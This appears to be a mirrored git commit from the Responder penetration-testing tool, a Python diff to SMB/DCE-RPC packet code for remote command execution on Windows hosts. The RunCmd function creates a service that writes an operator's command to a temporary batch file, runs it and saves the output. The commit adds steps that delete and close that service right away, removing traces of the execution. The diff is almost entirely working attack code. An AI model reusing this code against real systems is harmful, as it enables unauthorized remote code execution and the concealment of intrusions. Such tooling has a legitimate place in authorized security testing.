mirror of
https://github.com/lgandx/Responder.git
synced 2025-08-20 21:33:31 -07:00
Added: Now delete services on the fly.
This commit is contained in:
lgandx
parent
a814d0de81
commit
c6e401c229
1 changed files with 61 additions and 10 deletions
|
|
@ -324,6 +324,7 @@ class SMBTreeConnectData(Packet):
|
|||
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
|
||||
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
|
||||
|
||||
|
||||
class SMBNTCreateData(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x18"),
|
||||
|
|
@ -352,7 +353,6 @@ class SMBNTCreateData(Packet):
|
|||
Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
|
||||
self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
|
||||
self.fields["Bcc"] = struct.pack("<h",len(Data1))
|
||||
|
||||
class SMBReadData(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x0a"),
|
||||
|
|
@ -574,13 +574,12 @@ class SMBDCESVCCTLCreateService(Packet):
|
|||
|
||||
File = "%WINDIR%\\Temp\\"+self.fields["FileName"]
|
||||
WinTmpPath = "%WINDIR%\\Temp\\Results.txt"
|
||||
CleanService = "sc delete "+self.fields["ServiceName"]+"^&"#Start by deleting the service..then run the cmd.
|
||||
FinalCMD = CleanService+"del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
|
||||
#That is: delete service we just ran, delete the bat file (it's loaded in memory, no pb), echo original cmd into random .bat file, run .bat file.
|
||||
FinalCMD = "del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
|
||||
#That is: echo cmd into random .bat file, run .bat file, delete the bat file (it's loaded in memory).
|
||||
self.fields["FileName"] = ""#Reset it.
|
||||
self.fields["BinPathName"] = "%COMSPEC% /C echo "#make sure to escape "&" when using echo.
|
||||
self.fields["BinCMD"] = FinalCMD
|
||||
self.fields["BintoEnd"] = "& %COMSPEC% /C "+File
|
||||
self.fields["BintoEnd"] = "& %COMSPEC% /C "+File+" &exit"#make sure to exit when done.
|
||||
BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
|
||||
|
||||
## Calculate first
|
||||
|
|
@ -621,6 +620,17 @@ class SMBDCESVCCTLStartService(Packet):
|
|||
("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
])
|
||||
|
||||
class SMBDCESVCCTLDeleteService(Packet):
|
||||
fields = OrderedDict([
|
||||
("ContextHandle", ""),
|
||||
])
|
||||
|
||||
class SMBDCESVCCTLCloseService(Packet):
|
||||
fields = OrderedDict([
|
||||
("ContextHandle", ""),
|
||||
])
|
||||
|
||||
|
||||
class OpenAndX(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x0f"),
|
||||
|
|
@ -638,12 +648,11 @@ class OpenAndX(Packet):
|
|||
("Reserved2", "\x00\x00\x00\x00"),
|
||||
("Bcc", "\x0b\x00"),
|
||||
("Terminator", ""),
|
||||
("File", "\\hola.txt"),
|
||||
("FileNull", "\x00"),#00 00
|
||||
("File", "\\"),
|
||||
("FileNull", "\x00"),
|
||||
|
||||
])
|
||||
def calculate(self):
|
||||
#self.fields["File"] = self.fields["File"].encode('utf-16le')
|
||||
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
|
||||
|
||||
class ReadRequest(Packet):
|
||||
|
|
@ -662,7 +671,7 @@ class ReadRequestAndX(Packet):
|
|||
("Wordcount", "\x0C"),
|
||||
("AndXCommand", "\xff"),
|
||||
("Reserved", "\x00"),
|
||||
("AndXOffset", "\xde\xde"),#
|
||||
("AndXOffset", "\xde\xde"),
|
||||
("FID", "\x02\x40"),
|
||||
("Offset", "\x00\x00\x00\x00"),
|
||||
("MaxCountLow", "\xf0\xff"),
|
||||
|
|
@ -849,8 +858,49 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
|
|||
s.send(buffer1)
|
||||
data = s.recv(2048)
|
||||
|
||||
## DCE/RPC SVCCTLDeleteService.
|
||||
if data[8:10] == "\x25\x00":
|
||||
if data[len(data)-4:] == "\x05\x00\x00\x00":
|
||||
print "[+] Failed to start the service.\n"
|
||||
return False
|
||||
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandler)
|
||||
x = SMBDCEPacketData(Opnum="\x02\x00",Data=w)
|
||||
x.calculate()
|
||||
t = SMBTransDCERPC(FID=f,Data=x)
|
||||
t.calculate()
|
||||
packet0 = str(head)+str(t)
|
||||
buffer1 = longueur(packet0)+packet0
|
||||
s.send(buffer1)
|
||||
data = s.recv(2048)
|
||||
|
||||
## DCE/RPC SVCCTLCloseService
|
||||
if data[8:10] == "\x25\x00":
|
||||
if data[len(data)-4:] == "\x05\x00\x00\x00":
|
||||
print "[+] Failed to delete the service.\n"
|
||||
return False
|
||||
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
||||
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandler)
|
||||
x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
|
||||
x.calculate()
|
||||
t = SMBTransDCERPC(FID=f,Data=x)
|
||||
t.calculate()
|
||||
packet0 = str(head)+str(t)
|
||||
buffer1 = longueur(packet0)+packet0
|
||||
s.send(buffer1)
|
||||
data = s.recv(2048)
|
||||
|
||||
##Close FID Request
|
||||
if data[8:10] == "\x25\x00":
|
||||
head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
|
||||
t = CloseRequest(FID = f)
|
||||
packet1 = str(head)+str(t)
|
||||
buffer1 = longueur(packet1)+packet1
|
||||
s.send(buffer1)
|
||||
data = s.recv(2048)
|
||||
|
||||
##Tree connect c$
|
||||
if data[8:10] == "\x25\x00":
|
||||
if data[8:10] == "\x04\x00":
|
||||
|
||||
if data[len(data)-4:] == "\x05\x00\x00\x00":
|
||||
print "[+] Failed to start the service.\n"
|
||||
|
|
@ -937,3 +987,4 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
|
|||
return data
|
||||
|
||||
|
||||
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue